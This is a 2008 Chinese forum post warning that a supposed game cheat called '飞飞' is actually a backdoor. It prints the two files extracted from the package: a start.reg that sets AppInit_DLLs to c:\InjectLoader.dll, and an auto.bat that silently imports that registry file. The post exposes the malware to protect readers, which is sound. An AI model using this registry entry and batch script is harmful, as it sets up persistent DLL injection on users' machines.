这个是用记事本打开start.reg后的东西:大家自己看
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"DeviceNotSelectedTimeout"="15"
"GDIProcessHandleQuota"=dword:00002710
"Spooler"="yes"
"swapdisk"=""
"TransmissionRetryTimeout"="90"
"USERProcessHandleQuota"=dword:00002710
"AppInit_DLLs"="c:\\InjectLoader.dll"
下面这个是auto.bat里的内容,用ultraedit查看的内容:
@echo off
regedit /s start.reg
exit
大家都可以看到,把只运行一次.EXE的文件后缀改为.RAR
就能看到它里面的内容!就是这样!
3个文件分别是auto.bat start.reg InjectLoader.dll
只查看其中2个便可以看出它不是外挂是后门程序
大家明白了吧
所谓飞飞就是GDI+漏洞和后门程序
[ 此贴被changexj在2008-10-20 23:00重新编辑 ]